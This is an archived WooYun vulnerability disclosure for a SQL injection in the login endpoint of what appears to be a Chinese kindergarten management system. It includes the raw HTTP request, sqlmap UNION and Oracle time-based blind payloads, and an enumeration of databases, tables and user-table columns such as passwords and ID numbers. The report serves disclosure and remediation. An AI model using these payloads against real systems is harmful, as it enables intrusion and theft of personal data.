乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-04: 细节已通知厂商并且等待厂商处理中 2015-12-08: 厂商已经确认,细节仅向厂商公开 2015-12-18: 细节向核心白帽子及相关领域专家公开 2015-12-28: 细节向普通白帽子公开 2016-01-07: 细节向实习白帽子公开 2016-01-21: 细节向公众公开
POST /CKindMessageControl/createCookies.do HTTP/1.1Host: **.**.**.**User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0Accept: application/json, text/javascript, */*Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestReferer: http://**.**.**.**/login.jspContent-Length: 36Connection: keep-alivePragma: no-cacheCache-Control: no-cachecheckCode=123456&checkKindCode=admin
Parameter: checkKindCode Type: UNION query Title: Generic UNION query (NULL) - 21 columns Payload: checkCode=123456&checkKindCode=admin' UNION ALL SELECT CHR(58)||CHR(98)||CHR(105)||CHR(109)||CHR(58)||CHR(67)||CHR(67)||CHR(102)||CHR(114)||CHR(89)||CHR(87)||CHR(109)||CHR(106)||CHR(101)||CHR(66)||CHR(58)||CHR(119)||CHR(101)||CHR(122)||CHR(58),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL-- Type: AND/OR time-based blind Title: Oracle AND time-based blind Payload: checkCode=123456&checkKindCode=admin' AND 3836=DBMS_PIPE.RECEIVE_MESSAGE(CHR(106)||CHR(86)||CHR(122)||CHR(114),5) AND 'EEON'='EEON---back-end DBMS: Oracleavailable databases [16]:[*] CTXSYS[*] DBSNMP[*] DMSYS[*] EXFSYS[*] MDSYS[*] OLAPSYS[*] ORDSYS[*] OUTLN[*] SCOTT[*] SYS[*] SYSMAN[*] SYSTEM[*] TSMSYS[*] WMSYS[*] XDB[*] XXTY
Database: XXTY[267 tables]+---------------------------+| APN_DEVICETOKEN || APN_USER || CHARGE_PACKAGE || CLIENT_CLASSRING || CLIENT_COLLECTION || CLIENT_COMMENTS || CLIENT_COMMENTSNEWS || CLIENT_FILETASK || CLIENT_KINDNEWSFILE || CLIENT_KINDNEWSINFO || CLIENT_LIMITMODEL || CLIENT_PRAISE || CLIENT_REPLYCOMMENTS || CLIENT_REPLYNEWSCOMMENTS || CLIENT_REPLYVIDEOCOMMENTS || CLIENT_SPACENEWMESSAGE || CLIENT_TEACHERLOGTEXT || CLIENT_VALIDATEPHONE || CLIENT_VIDEODEVICE || CLIENT_VIDEOSERVER || CLIENT_WATCHHOUSE || CLIENT_WATCHUSER || CLIENT_WATCH_FAMILYUSER || CODE_KINDPROVINCECITY || FAMILY_TRIGGERSLOG || KIND_ADVERTISING || KIND_ADVERTISINGTYPE || KIND_ANDROIDVERSIONS || KIND_ANSWER || KIND_BACKMODULE || KIND_CLOUDKINDUSER || KIND_CLOUNDKINDMESSAGE || KIND_DIARYINFO || KIND_FAMILYLOGTEXT || KIND_FAMILYLOGTEXTFILE || KIND_FAMILYPHOTO || KIND_FAMILYPHOTOTYPE || KIND_FEEDBACK || KIND_FEEDBACKASTATE || KIND_KINDMESSAGE || KIND_LESSONPLAN || KIND_LESSONPLANPHOTO || KIND_LESSONREVIEW || KIND_LINK || KIND_MANAGECLIENTTABLE || KIND_NEWS || KIND_NEWSCOLUMN || KIND_NEWSLOGINUSER || KIND_NEWSREVIEW || KIND_NOPASSMESSAGE || KIND_ONLINEMESSAGE || KIND_OPINION || KIND_PARTITIONDICTIONARY || KIND_PHOTOINFO || KIND_PHOTO_NEWS || KIND_PROFICIENT || KIND_REPLACE || KIND_REPLYOPINION || KIND_TEACHERWORKDATA || KIND_TRIGGERSLOG || KIND_TRIGGERSRESOURCE || KIND_VIDEONEWS || MSG_DEVICETOKEN_ANDROID || MSG_DEVICETOKEN_EASEMOB || MSG_DEVICETOKEN_IOS || MSG_EASEMOBMSGTASK || MSG_LIST_ANDROID || MSG_LIST_IOS || MSG_NOTICE_ANDROID || MSG_NOTICE_IOS || MSG_PNBUSLEAVEMSG || MSG_PNBUSMSG || MSG_PNLIFEHELP || MSG_RECEIVELOG || MSG_SENDSUCCESS_ANDROID || MSG_SEND_ANDROID || MSG_SEND_IOS || MSG_SMSMESSAGEBYEXCEPTION || MSG_SMSMESSAGEBYMANUAL || MSG_SMSMESSAGELOG || MSG_SMSMESSAGETASK || MSG_SMSMODEL || MSG_TEMPLIST_ANDROID || MSG_TEMPLIST_IOS || MYTEST_USER || NEW_PHOTO_STUPHOTOMSG || OA2_USER || QUICK_TABLE || SHIMIAO_USER || SHI_BUYBOOKINFO || SHI_CAPITAL || SYS_ACCESSFILE || SYS_ACCESSORIES || SYS_ACCESSORIESATTACHMENT || SYS_ACTIVITYC || SYS_ACTIVITYS || SYS_ATTENDANCE || SYS_ATTENDANCECOUNT || SYS_ATTENDANCEFILES || SYS_ATTENDANCELOG || SYS_ATTENDANCENEWS || SYS_ATTENDANCESTUSAVE || SYS_ATTENDANCEVIDEO || SYS_AUTOGRAPHINFO || SYS_CARDLOG || SYS_CHECKINFO || SYS_CLASS || SYS_CLASSEXAMINE || SYS_CLASSPHOTO || SYS_CLASSTABLEHISTORY || SYS_COMMENTS || SYS_CONFIG || SYS_CONFIG_COOKBOOK || SYS_CONFIG_DICTIONARYITEM || SYS_CONFIG_QUESTIONDIC || SYS_CONFIG_WEEKLYPLAN || SYS_COOKBOOK || SYS_COOKBOOKCONFIG || SYS_COOKBOOKEXPORT || SYS_COOKFILE || SYS_COOKINPICTURE || SYS_COOKMENU || SYS_COOKMSGBYDAY || SYS_COURSEWARE || SYS_DICTIONARY || SYS_DICTIONARYITEM || SYS_ERRORLOGIOS || SYS_EXAMINECOMMENT || SYS_FILE || SYS_FILELOG || SYS_HARDWARECFG || SYS_HOMEVISIT || SYS_HOMEVISITFILE || SYS_HOMEVISITMODE || SYS_INFORMATIONBANK || SYS_INFORMATIONBANKFILE || SYS_KINDACTIVITY || SYS_KINDBUS || SYS_KINDFILE || SYS_KINDMESSAGE || SYS_KINDMODULECHECKINFO || SYS_KINDVIDEO || SYS_KINDVIDEOCOMMENTS || SYS_KINDVIDEOFOREVER || SYS_KINDWECHAT || SYS_KINDWORKUPLOAD || SYS_KINDWORKUPLOADLOG || SYS_KINDWX || SYS_KMSINFOLOG || SYS_KMSLOG || SYS_KNOWLEDGEBASE || SYS_LEARNCOMMENT || SYS_LOGANDROID || SYS_MOBILEMODELOPT || SYS_MOBILEMODELOPTION || SYS_MODULE || SYS_MODULECHECKINFO || SYS_MODULEFUNCTION || SYS_MODULEKINDCHECKINFO || SYS_MODULERIGHT || SYS_NIGHTSTORY || SYS_PARENTALADV || SYS_PARENTALADVPHOTO || SYS_PHOTOCOMMENTS || SYS_PHOTOCOMPLETE || SYS_PHOTOTASK || SYS_PHOTO_STUACTIVITY || SYS_PHOTO_STUPHOTOMSG || SYS_PNMESSAGEFAILURE || SYS_PNMESSAGEFILE || SYS_PNMESSAGEINFO || SYS_PNMESSAGELOG || SYS_PNSENDMESSAGE || SYS_PNSENDMESSAGEOLD || SYS_PNSENDMESSAGETEMP || SYS_PNSENDMSG || SYS_PN_MESSAGEWORK || SYS_PN_MESSAGEWORKLOG || SYS_POSTMANAGE || SYS_PUNCH_MACHINE || SYS_QUESTIONNAIREINFO || SYS_QUESTIONNAIREMESSAGE || SYS_QUESTIONNAIRES || SYS_ROLE || SYS_RULESSYSTEM || SYS_STUACTIVITY || SYS_STUDENT || SYS_STUDENTACTIVITY || SYS_STUDENTBILLS || SYS_STUDENTCARDS || SYS_STUDENTEASEMOB || SYS_STUDENTEMP || SYS_STUDENTEXAMINE || SYS_STUDENTFAMILY || SYS_STUDENTHOLIDAY || SYS_STUDENTLEARNING || SYS_STUDENTLEAVE || SYS_STUDENTLOG || SYS_STUDENTPHYSICAL || SYS_STUDENTREGEASEMOBLOG || SYS_STUDENTSET || SYS_STUMORNEXAMINE || SYS_STUMORNEXAMINE_S || SYS_STUMORNEXAMINE_TEMP || SYS_STUNIGHTEXAMINE || SYS_SYSEMAILURL || SYS_SYSUSERLOG || SYS_TABLESALIASE || SYS_TEACHERARCHIVES || SYS_TEACHERARCHIVESFILE || SYS_TEACHEREXAMINE || SYS_TEACHERTRANSACTION || SYS_TEADAYEXAMINE || SYS_TEAHERARCHIVESMODE || SYS_TEAMONTHEXAMINE || SYS_TEATALKFILE || SYS_TEATALKTEXT || SYS_TEAWORK || SYS_TEMPORARYFILE || SYS_UPLOADFILE || SYS_UPLOADFILECOMPLETE || SYS_USER || SYS_USERCONFIG || SYS_USERINFOACCESSORY || SYS_VACATIONSTUDENT || SYS_VPFILEUPLOAD || SYS_VPOPTION || SYS_WECHATLEVELS || SYS_WEEKINFOWORK || SYS_WEEKLYINPICTURE || SYS_WEEKLYPLAN || SYS_WEEKLYPLANEXPORT || SYS_WEEKLYPLANREMARK || SYS_WEEKSPLAN || SYS_WXLOGIN || SYS_WXPHOTO || TEMP_STULEAVE || WEB_EMPLOYEE || WEB_KINDBASICINFO || WEB_KINDCLASS || WEB_KINDFOCUSPHOTO || WEB_KINDFRUIT || WEB_KINDGROUPPHOTO || WEB_KINDINTRODUCE || WEB_KINDMESSAGE || WEB_KINDNETPHOTO || WEB_KINDNEWS || WEB_KINDNEWSPHOTO || WEB_KINDRECRUITMENT || WEB_KINDTEACHER || WEB_KINDTEACHERMIEN || WEB_KINDUSER || WEB_KIND_FEEDBACK || WEB_KIND_LINKUS || WEB_KIND_MODULE || WEB_KIND_NEWS || WEB_KIND_NEWSFILE || WEB_KIND_OPINION || WEB_KIND_USER || WEB_PHOTO || WEB_PHOTOALBUM || WEB_REGINFO || WEB_TEXTBOOK || WEB_TEXTBOOKTYPE || WX_BACKUSER || WX_MESSAGEINFO || WX_MESSAGELOG |+-------------------Database: XXTYTable: SYS_USER[24 columns]+-----------------+----------+| Column | Type |+-----------------+----------+| ACCOUNTADDRESS | VARCHAR2 || ADDRESS | VARCHAR2 || BIRTHDAY | VARCHAR2 || CLIENTLOGINDATE | DATE || DESCRIPTION | VARCHAR2 || ENDONLINEDATE | DATE || ETHNIC | VARCHAR2 || FIXEDPHONE | VARCHAR2 || GENDER | VARCHAR2 || IDNUMBER | VARCHAR2 || ISREGEASEMOB | NUMBER || KINDID | VARCHAR2 || LOGINUSER | VARCHAR2 || MOBILEPHONE | VARCHAR2 || PARTITIONCODE | VARCHAR2 || PHOTOHEADURL | VARCHAR2 || POSTID | VARCHAR2 || PWD | VARCHAR2 || RFID | VARCHAR2 || ROLEID | NUMBER || STATUSFLAG | VARCHAR2 || USERID | VARCHAR2 || USERNAME | VARCHAR2 || USERNAMEAUDIO | VARCHAR2 |+-----------------+----------+--------+
危害等级:高
漏洞Rank:10
确认时间:2015-12-08 13:03
CNVD确认并复现所述情况,已经转由CNCERT向中国联合网络通信集团有限公司通报,由其后续协调网站管理部门处置.
暂无